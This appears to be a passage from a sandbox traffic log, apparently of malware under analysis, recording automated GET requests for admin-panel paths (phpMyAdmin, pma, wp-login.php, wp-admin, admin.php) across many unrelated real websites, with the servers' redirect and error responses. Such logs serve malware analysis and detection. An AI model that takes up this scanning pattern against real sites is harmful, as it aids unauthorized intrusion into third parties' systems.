Feb 21, 2024 00:26:15.268630028 CET	172	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.453221083 CET	109	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/phpMyAdmin/ cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
380	192.168.2.6	64247	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.275616884 CET	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.740020037 CET	1286	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df b7 6e cb da d0 b1 88 ce 82 38 2d f4 03 60 67 Data Ascii: 253a}ru\ufv#iGDI'[N3qr6{6I(S,;VyIL99_mmmR%@7Fw8<~ooN88+:9;hhfA{h0k5o45&aq&T\|ngFSp-[~%/\k;S5(83vK}b>w:560Fv4nn4gjQ]~c1j1O.CvrqF\|8seO6LsJ7g]n3>-F5Aix8`DN.\|]a+5f ]ida\,jyT(1'/,'kvS[5?~=g>{Qe7oBfzQ NT#EO%q90c/Z[B~5{bx\|&5a~4nvjZUHT7_C=f~k/ PdCm>m'Cp)c4v_Z>\9ZU^rmUu,s`-U#>#-u>yVW0C,_nP\eU2R8U@Y#=U?$mgPC/#n8-`g
Feb 21, 2024 00:26:15.740057945 CET	1286	IN	Data Raw: 53 d2 b8 41 e7 0b 07 75 6e a1 dd dd 51 7b b3 5e 4d be 9d dc f4 f9 34 7c 8e 9a 78 fe b5 ea 76 ea fb ee 81 6d 38 dc 1d 85 e3 7d f7 a7 9f 2a 49 2b ef ed f7 ee c7 8f 9d a8 ef 71 cf ab 56 a7 1b fa 68 da 18 fa de e4 19 66 81 67 de 80 ef db c3 f2 a6 f3 Data Ascii: SAunQ{^M4\|xvm8}I+qVhfgu\34Tv>?\!'s{41)"16m^gPZCGIIUjnmWw}6]\|[ehpfvMUoUwN}o[A
Feb 21, 2024 00:26:15.740099907 CET	1286	IN	Data Raw: 98 8e d0 13 e4 f4 24 0b d2 f2 73 db 61 82 4f be a7 95 05 d6 8b 4c b7 84 1e 07 9b ba fe de 1e 32 27 64 a7 27 6c ef 23 ac 3a 35 7d d3 3c 9d f6 56 3f d0 52 c3 0c 6e f3 1a 39 d1 b7 82 b1 7d 0d 0f a9 0d df 1c 3e a9 c9 54 cb 99 c3 7f 28 68 78 37 e0 02 Data Ascii: $saOL2'd'l#:5}<V?Rn9}>T(hx7>N_bfYf==#F2,z6qen%z7%\Gaa9a(8m-0Cc,no76mOE1Mm[.
Feb 21, 2024 00:26:15.740145922 CET	1286	IN	Data Raw: 0d a6 e6 45 f9 1a 7d 19 37 b3 05 a4 1c 68 87 dd b7 cf 7e 39 01 0f 37 0f 0f c4 d2 0f 99 68 63 0f ae 54 40 8d 9b 94 8d 88 d7 b1 01 09 42 8a 55 df 6a ff 01 79 26 1f 11 13 d2 df 47 07 c2 2a 4d c5 e1 16 20 68 4c ba 87 91 7e e7 b9 3d 67 e6 77 34 24 41 Data Ascii: E}7h~97hcT@BUjy&GM hL~=gw4$A#STSUR_Kwg1shSf# wKb[lPDF+RDAOSSS<9-RGYX}*GBvAhDg+-H1Ar8"A8YlKM/5NC
Feb 21, 2024 00:26:15.740197897 CET	1286	IN	Data Raw: 4d 17 fb f7 8e 68 11 aa 3d d4 7d 77 27 7e 7a b3 5e bf c1 4f ca 99 a7 91 b3 0b fb 20 35 13 a6 29 9c 09 e4 cd 55 5f 6a 18 57 e5 c4 03 bd 9e 13 8b c2 dd 00 99 40 2f e0 82 78 c5 67 28 0e 8d 7d 8f c3 ce 58 d8 9f 28 7b 28 4d 0a f8 31 68 87 62 4f ec 50 Data Ascii: Mh=}w'~z^O 5)U_jW@/xg(}X({(M1hbOPp.<B>`_M\|~O0RQ,oEVo@8VOUluNB@,=z'GujE,~ yR2%F.G8Ij~DF>qR
Feb 21, 2024 00:26:15.740211010 CET	1286	IN	Data Raw: 79 99 99 b5 e1 b3 a0 99 5b 78 e6 1f 15 1a 4e 25 d8 14 0e 42 e8 71 a4 f7 b8 8d 10 87 f2 23 51 4c 4a 1e bd d5 55 ef b1 c7 c9 4e fc 4c 44 73 f2 7c 12 54 39 93 8b 8f 6b 21 30 e0 b3 10 ab 7e f8 48 06 3a 1c cf 70 d3 8e c2 74 e2 c0 71 f2 9e 4d 66 f0 05 Data Ascii: y[xN%Bq#QLJUNLDs\|T9k!0~H:ptqMfg.\#Kr&\|r(M#r.:]I >+l0-"/&<d-vZM#YG5FC#J8LNL_EN}lfp1"$#!/GB{dNdafHHv82
Feb 21, 2024 00:26:15.740226984 CET	1286	IN	Data Raw: 45 2d 72 43 2d 73 be b9 93 a7 e3 cc 64 ae 28 42 af d8 cf b5 1e 5e 9f 70 42 93 8b b0 5b 18 e6 90 cc 6c e5 0e 64 32 51 14 41 ec 57 09 81 5d 88 cd 54 c5 99 ff 13 02 9d 2e 24 3a 80 a3 2c 0f 37 33 4f a1 99 c9 cc b0 72 38 a5 a1 f6 6b 0a c4 7a 64 73 a0 Data Ascii: E-rC-sd(B^pB[ld2QAW]T.$:,73Or8kzdslk@Gf2^FrQ]ona[9rzoHe#*3q3E'D2@rczE!_j0+(\|`lY-9cLHTkD
Feb 21, 2024 00:26:15.740235090 CET	951	IN	Data Raw: c9 6c 5c cf 29 ce ef 4d d7 65 0c 57 65 94 05 f0 f7 f6 47 dc 25 89 6c be 57 e8 89 41 87 07 dc bc 1e 96 4b 83 e0 77 91 d9 6d 0f 4a 15 b6 d9 61 ba c9 9e 3c 91 4d 53 8d 29 4e ff 72 c3 57 c0 de 80 e1 4f 55 59 07 54 38 42 61 3a 2b 78 f9 5f 0c 2b 55 13 Data Ascii: l\)MeWeG%lWAKwmJa<MS)NrWOUYT8Ba:+x_+Uf!s@yH-$HrC{,e7WEh4QN:!%xvX.=,\^yJ}5S9o\>9LTQwa(aX[EI1K\|VpCxqI-^

Session ID	Source IP	Source Port	Destination IP	Destination Port
381	192.168.2.6	64370	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.324852943 CET	176	OUT	GET /pma/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.431348085 CET	312	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/pma/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:15 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:15.638078928 CET	312	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/pma/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:15 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
382	192.168.2.6	64368	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.324913979 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.471664906 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:18.681870937 CET	208	OUT	GET /wp-admin/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://proton.me/de/mail
Feb 21, 2024 00:26:18.829957962 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:19.055593014 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
383	192.168.2.6	64271	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.337373972 CET	173	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.552679062 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/PhpMyAdmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471575.4227356331621916 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLhZ4wvHcBCgqBuXgRA8LPTYm++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRaliAOoNYfaoOcEUBcn8PjiPWF5E9CXYLvH7LNMFKpZyaEZaL8h2+aCSVueuPxiTAzMw==, Data Raw: Data Ascii:
Feb 21, 2024 00:26:15.552711964 CET	259	IN	Data Raw: 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4a 54 50 63 43 39 66 53 6a 49 59 53 43 6c 7a 67 68 43 79 73 4b 39 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f 52 Data Ascii: UNV7KOq4oGjA5+PKsX47JTPcC9fSjIYSClzghCysK9jPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+A7UK33n7eH/krKDcczJcFk=,9n3wTMzaU7zAZzBAj7gVU8iTp+IZsUb0JziiD/An6Fv4D2PFRhC5HA4zrltzn4LTg8u7ZtrWYB/MjnDPqQQSOw==Cache-Control: no-cacheX-Content-Type-Opti

Session ID	Source IP	Source Port	Destination IP	Destination Port
384	192.168.2.6	64371	178.33.253.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.406538963 CET	168	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.576414108 CET	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cfca.eu/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
385	192.168.2.6	64369	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.412534952 CET	168	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.589046955 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
386	192.168.2.6	64600	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.445226908 CET	172	OUT	GET /wp-login.php HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.550163984 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>
Feb 21, 2024 00:26:18.195729017 CET	215	OUT	GET /wp-admin/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.corp.att.com/worldwide/
Feb 21, 2024 00:26:18.298355103 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
387	192.168.2.6	64461	85.214.145.11	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.445317030 CET	173	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.625718117 CET	394	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
388	192.168.2.6	64542	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.502147913 CET	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.679002047 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/phpMyAdmin/ Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
389	192.168.2.6	64578	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.512532949 CET	169	OUT	GET /admin.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.689548016 CET	429	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Location: https://popular.de/admin.php Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
390	192.168.2.6	64613	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
